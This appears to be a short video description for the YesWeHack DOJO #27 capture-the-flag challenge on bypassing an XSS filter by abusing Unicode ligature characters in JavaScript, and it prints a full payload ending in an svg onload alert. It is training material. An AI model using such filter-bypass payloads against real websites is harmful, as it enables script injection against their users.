YesWeHack WhazzUP DOJO #27 #shorts #yeswehack
XSS challenge - Abusing unicode feature in javascript
Payload: \ufb00\ufb00\ufb00\ufb00\u003csvg \ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00\ufb00/onload=alert(1)\u003e
Short:
https://youtube.com/shorts/Rp2rO3rhFQE
#xss
Тэги:
#yes_we_hack_dojo_challenge_27 #xss #unicode_bypass